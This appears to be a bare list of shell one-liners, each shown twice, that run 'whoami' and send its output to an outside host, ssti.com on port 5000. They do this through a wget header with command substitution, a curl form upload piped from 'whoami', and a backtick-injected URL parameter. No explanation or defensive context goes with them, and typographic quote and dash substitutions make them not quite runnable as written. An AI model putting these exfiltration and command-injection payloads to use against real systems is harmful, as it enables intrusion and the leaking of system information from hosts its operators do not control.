wget –header=”test:$(whoami)” http://ssti.com:5000\?username\=1

whoami | curl -F “:data=@-“ http://ssti.com:5000\?username\=1

Curl “http://ssti.com:5000?username=`whoami`"

wget –header=”test:$(whoami)” http://ssti.com:5000\?username\=1
whoami | curl -F “:data=@-“ http://ssti.com:5000\?username\=1
Curl “http://ssti.com:5000?username=`whoami`"